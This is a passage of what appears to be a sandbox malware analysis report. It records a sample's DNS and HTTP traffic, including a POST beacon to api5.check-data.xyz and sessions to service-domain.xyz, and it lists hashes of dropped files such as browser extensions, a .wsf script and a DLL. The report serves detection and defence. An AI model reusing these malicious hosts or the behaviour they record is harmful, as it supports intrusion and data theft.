                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                              Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                              Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                              Content-Length: 854
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Server: sffe
                                                                                                              X-XSS-Protection: 0
                                                                                                              Date: Mon, 26 Aug 2024 04:29:28 GMT
                                                                                                              Expires: Mon, 26 Aug 2024 05:19:28 GMT
                                                                                                              Cache-Control: public, max-age=3000
                                                                                                              Age: 2088
                                                                                                              Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                              Content-Type: application/pkix-crl
                                                                                                              Vary: Accept-Encoding
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              o.pki.goog
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              o.pki.goog
                                                                                                              IN A
                                                                                                              Response
                                                                                                              o.pki.goog
                                                                                                              IN CNAME
                                                                                                              pki-goog.l.google.com
                                                                                                              pki-goog.l.google.com
                                                                                                              IN A
                                                                                                              216.58.214.163
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: o.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: ocsp_responder
                                                                                                              Content-Length: 472
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Date: Mon, 26 Aug 2024 04:59:21 GMT
                                                                                                              Cache-Control: public, max-age=14400
                                                                                                              Content-Type: application/ocsp-response
                                                                                                              Age: 295
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: o.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: ocsp_responder
                                                                                                              Content-Length: 471
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Date: Mon, 26 Aug 2024 04:21:26 GMT
                                                                                                              Cache-Control: public, max-age=14400
                                                                                                              Content-Type: application/ocsp-response
                                                                                                              Age: 2570
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: o.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: ocsp_responder
                                                                                                              Content-Length: 471
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Date: Mon, 26 Aug 2024 04:34:52 GMT
                                                                                                              Cache-Control: public, max-age=14400
                                                                                                              Content-Type: application/ocsp-response
                                                                                                              Age: 1765
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              clients2.google.com
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              clients2.google.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              clients2.google.com
                                                                                                              IN CNAME
                                                                                                              clients.l.google.com
                                                                                                              clients.l.google.com
                                                                                                              IN A
                                                                                                              172.217.18.206
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              172.217.18.206:443
                                                                                                              Request
                                                                                                              GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU HTTP/1.1
                                                                                                              Host: clients2.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Response
                                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-frbVhUjIEdvr2UF8-v7fEg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 26 Aug 2024 05:04:16 GMT
                                                                                                              Location: https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Server: GSE
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Accept-Ranges: none
                                                                                                              Vary: Accept-Encoding
                                                                                                              Transfer-Encoding: chunked
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              clients2.googleusercontent.com
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              clients2.googleusercontent.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              clients2.googleusercontent.com
                                                                                                              IN CNAME
                                                                                                              googlehosted.l.googleusercontent.com
                                                                                                              googlehosted.l.googleusercontent.com
                                                                                                              IN A
                                                                                                              142.250.178.129
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              142.250.178.129:443
                                                                                                              Request
                                                                                                              GET /crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: clients2.googleusercontent.com
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 26186
                                                                                                              X-GUploader-UploadID: AHxI1nNL7H3AJRDcftdM8nudrN063LHkjG-K2xCLaAq_CiodWecH9ArWxzdSUlfXc63WthxHMbk
                                                                                                              X-Goog-Hash: crc32c=i5zIOg==
                                                                                                              Server: UploadServer
                                                                                                              Date: Sun, 25 Aug 2024 07:35:10 GMT
                                                                                                              Expires: Mon, 25 Aug 2025 07:35:10 GMT
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Age: 77347
                                                                                                              Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                              ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              api5.check-data.xyz
                                                                                                              rundll32.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              api5.check-data.xyz
                                                                                                              IN A
                                                                                                              Response
                                                                                                              api5.check-data.xyz
                                                                                                              IN CNAME
                                                                                                              checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                              checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                              IN A
                                                                                                              44.228.3.54
                                                                                                              checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                              IN A
                                                                                                              44.224.108.88
                                                                                                            • flag-us
                                                                                                              POST
                                                                                                              http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                              rundll32.exe
                                                                                                              Remote address:
                                                                                                              44.228.3.54:80
                                                                                                              Request
                                                                                                              POST /api2/google_api_ifi HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                              Host: api5.check-data.xyz
                                                                                                              Content-Length: 722
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Cache-control: no-cache="set-cookie"
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Date: Mon, 26 Aug 2024 05:01:28 GMT
                                                                                                              Server: nginx
                                                                                                              Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                              Content-Length: 0
                                                                                                              Connection: keep-alive
                                                                                                            • 54.210.117.250:443
                                                                                                              service-domain.xyz
                                                                                                              tls
                                                                                                              gLYDEcB.exe
                                                                                                              399 B
                                                                                                              219 B
                                                                                                              5
                                                                                                              5
                                                                                                            • 54.210.117.250:443
                                                                                                              service-domain.xyz
                                                                                                              tls
                                                                                                              gLYDEcB.exe
                                                                                                              361 B
                                                                                                              219 B
                                                                                                              5
                                                                                                              5
                                                                                                            • 54.210.117.250:443
                                                                                                              service-domain.xyz
                                                                                                              tls
                                                                                                              gLYDEcB.exe
                                                                                                              334 B
                                                                                                              219 B
                                                                                                              6
                                                                                                              5
                                                                                                            • 54.210.117.250:443
                                                                                                              service-domain.xyz
                                                                                                              gLYDEcB.exe
                                                                                                              190 B
                                                                                                              92 B
                                                                                                              4
                                                                                                              2
                                                                                                            • 216.58.214.163:80
                                                                                                              http://c.pki.goog/r/r1.crl
                                                                                                              http
                                                                                                              gLYDEcB.exe
                                                                                                              394 B
                                                                                                              1.7kB
                                                                                                              6
                                                                                                              4

                                                                                                              HTTP Request

                                                                                                              GET http://c.pki.goog/r/r1.crl

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 216.58.214.163:80
                                                                                                              http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D
                                                                                                              http
                                                                                                              gLYDEcB.exe
                                                                                                              1.2kB
                                                                                                              3.1kB
                                                                                                              10
                                                                                                              6

                                                                                                              HTTP Request

                                                                                                              GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO

                                                                                                              HTTP Response

                                                                                                              200

                                                                                                              HTTP Request

                                                                                                              GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D

                                                                                                              HTTP Response

                                                                                                              200

                                                                                                              HTTP Request

                                                                                                              GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 172.217.18.206:443
                                                                                                              https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU
                                                                                                              tls, http
                                                                                                              gLYDEcB.exe
                                                                                                              1.1kB
                                                                                                              8.6kB
                                                                                                              10
                                                                                                              12

                                                                                                              HTTP Request

                                                                                                              GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU

                                                                                                              HTTP Response

                                                                                                              302
                                                                                                            • 142.250.178.129:443
                                                                                                              https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                              tls, http
                                                                                                              gLYDEcB.exe
                                                                                                              1.6kB
                                                                                                              38.0kB
                                                                                                              21
                                                                                                              32

                                                                                                              HTTP Request

                                                                                                              GET https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 44.228.3.54:80
                                                                                                              http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                              http
                                                                                                              rundll32.exe
                                                                                                              1.2kB
                                                                                                              536 B
                                                                                                              5
                                                                                                              3

                                                                                                              HTTP Request

                                                                                                              POST http://api5.check-data.xyz/api2/google_api_ifi

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 8.8.8.8:53
                                                                                                              service-domain.xyz
                                                                                                              dns
                                                                                                              gLYDEcB.exe
                                                                                                              64 B
                                                                                                              80 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              service-domain.xyz

                                                                                                              DNS Response

                                                                                                              54.210.117.250

                                                                                                            • 8.8.8.8:53
                                                                                                              c.pki.goog
                                                                                                              dns
                                                                                                              gLYDEcB.exe
                                                                                                              56 B
                                                                                                              107 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              c.pki.goog

                                                                                                              DNS Response

                                                                                                              216.58.214.163

                                                                                                            • 8.8.8.8:53
                                                                                                              o.pki.goog
                                                                                                              dns
                                                                                                              gLYDEcB.exe
                                                                                                              56 B
                                                                                                              107 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              o.pki.goog

                                                                                                              DNS Response

                                                                                                              216.58.214.163

                                                                                                            • 8.8.8.8:53
                                                                                                              clients2.google.com
                                                                                                              dns
                                                                                                              gLYDEcB.exe
                                                                                                              65 B
                                                                                                              105 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              clients2.google.com

                                                                                                              DNS Response

                                                                                                              172.217.18.206

                                                                                                            • 8.8.8.8:53
                                                                                                              clients2.googleusercontent.com
                                                                                                              dns
                                                                                                              gLYDEcB.exe
                                                                                                              76 B
                                                                                                              121 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              clients2.googleusercontent.com

                                                                                                              DNS Response

                                                                                                              142.250.178.129

                                                                                                            • 8.8.8.8:53
                                                                                                              api5.check-data.xyz
                                                                                                              dns
                                                                                                              rundll32.exe
                                                                                                              65 B
                                                                                                              159 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              api5.check-data.xyz

                                                                                                              DNS Response

                                                                                                              44.228.3.54
                                                                                                              44.224.108.88

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              b731bebaa7c2551eed44d76cd5e76ff3

                                                                                                              SHA1

                                                                                                              965b3a0c57891661454681f1f6acbcb282321fd0

                                                                                                              SHA256

                                                                                                              81df7344c54b6be5bece3eacf37ab55125a13111f348b1107af482dfcdb27891

                                                                                                              SHA512

                                                                                                              fa747a132f7ea38ae407808fe298243f21d7bb725e79c2e9ba793f2bacaf3277d958d43355ea53e6871024d9a303a3f1eda7dee46b1d06b5122253d9aad67817

                                                                                                            • C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              3019b73c639d36635656868079266e22

                                                                                                              SHA1

                                                                                                              02ba8c9fae452ba2d13b73330a34a69f5245b550

                                                                                                              SHA256

                                                                                                              2c341aa3858b5cc69c135865c8cdc895afc5011b6e5ec27ecbfe765c076f4d4e

                                                                                                              SHA512

                                                                                                              e8e5aab3bccaaf31364fc14a44c2ab33004c2dcd7987cd34342657ebf5a1ef737b723732411733c011e25bd7d2dd1cdb14eb63fd538fe8f9e2f43e188fd61a1a

                                                                                                            • C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              7f074d6d3dc8ba867cb1a9595d75fa82

                                                                                                              SHA1

                                                                                                              ba9940e7d8e308900dd00ccba56792267e8fd760

                                                                                                              SHA256

                                                                                                              013b14d5876c1cd228c502195410fb6fc4e3d5d1bab9ef8b2510aa7559de6afe

                                                                                                              SHA512

                                                                                                              fddece89e378bbc5115792e7d65e08ed0b9e0d72bf36e682891e46c21493ad1a80071eb53bedaf1011859e9c8e7f830504610c3e61305b631dce72f988778562

                                                                                                            • C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              e3124c51196627235f81021202497539

                                                                                                              SHA1

                                                                                                              47c94b60c6beda449239806d837a6aa9db5e9f24

                                                                                                              SHA256

                                                                                                              41fcef80af53d1b93a4f92c8e636572d8c4aeecb5fc3214e6ef61a0225f69b73

                                                                                                              SHA512

                                                                                                              b7b7583d5106f43ba4b28e6963f6d8e934626e79438bc1c33cedc63f04e4b6031caa2ff4f9fa933a61a26bb458b7b59eeea9b38553fe08c59c99cc91242582d8

                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                              MD5

                                                                                                              2f02cc2a0c1066593cac569fb44fde98

                                                                                                              SHA1

                                                                                                              cdef228219837ccb3c7061afcd70760ef0b9c720

                                                                                                              SHA256

                                                                                                              a32071cd6aa585d567c0f5425759c85098b1f460ef320f7ad43c9ac635f3fca5

                                                                                                              SHA512

                                                                                                              0f9e6449d02e31fc4ebabd09bf03d454dceb703968b9c53b771512bd045ea7256df091f792b856463d03e5a8e17f40e28c826d20ec710b0cc2e92eee524269f1

                                                                                                            • C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              a6e25931e5fcd838c93db33dda4ef846

                                                                                                              SHA1

                                                                                                              6bee9fe9acfe5d3901a5748029aa5b1aa14ddf63

                                                                                                              SHA256

                                                                                                              dc0e3e35c22281d704d36d12deb132362a384d008a5bdff0344054d52281d825

                                                                                                              SHA512

                                                                                                              dae9b7d2c5a077e1adc8e8ac289cdbddf621caadea092acb2a06ba5fbfb1f785b0f37e4573d73952ecdc6198ddf78df2900fa6321d647ac8f867899471b3c3bb

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                              Filesize

                                                                                                              187B

                                                                                                              MD5

                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                              SHA1

                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                              SHA256

                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                              SHA512

                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                              Filesize

                                                                                                              136B

                                                                                                              MD5

                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                              SHA1

                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                              SHA256

                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                              SHA512

                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                              Filesize

                                                                                                              150B

                                                                                                              MD5

                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                              SHA1

                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                              SHA256

                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                              SHA512

                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                              Filesize

                                                                                                              10KB

                                                                                                              MD5

                                                                                                              6263492cad31587eeaebe54841a913de

                                                                                                              SHA1

                                                                                                              c0a0d95fda568a7e87f520654a6e4f673977a659

                                                                                                              SHA256

                                                                                                              484df10437e1288fe4ed95c1458b2520f73227a541e7694b07049d7ea0adf4dc

                                                                                                              SHA512

                                                                                                              f091e9ba9ee052567476341d4ec94d74cf4cd15d5663312f8fd92a22b371c81e0b73d51ebfbe682c8394b22f35242c2961bb41fc51bbbee3426e5ea2ab2c2fee

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              bda73eecb76840daa19eca61711a1c37

                                                                                                              SHA1

                                                                                                              66698dde4c0976da38898bdfdd20c2e016428a7c

                                                                                                              SHA256

                                                                                                              ebc0f7a1d36ee402647fe7d120eae2f4e94fc1bc9f34e82b725b3cf66b4c7d67

                                                                                                              SHA512

                                                                                                              bf9215b47fd38fd33a397be8b7611c5b5690cc27d0a2f6d0b2c5ef359f4565a1255e510390dc1e67e3591e246a93b36a7800937e692b2604415c303592702b79

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              0a567b8bc8378e2a5dd6826b76a4d6f2

                                                                                                              SHA1

                                                                                                              b42c32e919e27d08a9938ba9e2f3dd1a54ffee7e

                                                                                                              SHA256

                                                                                                              710f43401f05cceb56c8e634c6a517e6d710cb8d76eea3382ce6ce1f3c30fbd8

                                                                                                              SHA512

                                                                                                              86e3ee33bc40ecfab36fec49305e5c473ec1b6ad91bc9ddf145f5207860cfc7bbedc0bc0113e2f187809a9b4bf359af935269932e24fa1848f0acea19ca9fc2d

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              3857a9ee970ee59e1dd9aa5993b2acab

                                                                                                              SHA1

                                                                                                              74ac17d38a75eff4b318822cca3ce293fe48e21a

                                                                                                              SHA256

                                                                                                              0413cde3bfca7a186dd6db0a26a3bfc158d583dd26ecfbebb45a8fde30519f85

                                                                                                              SHA512

                                                                                                              716ca6ffe580ecf08ecce8cd52a88046b62426a0cfecc3ff1bcfc7279547a9f1d11af7b431ce268b08b215da1b7ee4ed4c3fddc8d6458355ec2541b4b906baec

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              5b2812a8def01bd36355568e3b58d8fb

                                                                                                              SHA1

                                                                                                              9fbd359a46014c36a97184fc89ee3b6137222afb

                                                                                                              SHA256

                                                                                                              2aa04fd9a7b6120bd225557cf6d140d69d2a2482df62a4b894d7080552453734

                                                                                                              SHA512

                                                                                                              deabf5082da0173a5391e6deb8ec0e91a3636a2c7660306cca2d7026f6fc6b9199950fe14d6f3308fd77fe29cf46cb0dba4b2f664f9cf04016b994e6716ca038

                                                                                                            • C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf

                                                                                                              Filesize

                                                                                                              9KB

                                                                                                              MD5

                                                                                                              324f0455234fecd0e180f82174522dc4

                                                                                                              SHA1

                                                                                                              845e4b74bdffd042b5fb975d64bb21c731009d3a

                                                                                                              SHA256

                                                                                                              157adfff9722ed4036505039889f7645a0a3e9f410d0a8469a57a22b12a7bc34

                                                                                                              SHA512

                                                                                                              f3a5ecc3063b76eb3c9214cbc7bae1ac5c39fe20cdd451be5ecf8d757ea59a4bc9872601aa4c2adc71416ea8c16f836d7ee80d10d3b3c55caac2c5025c7dbd79

                                                                                                            • C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll

                                                                                                              Filesize

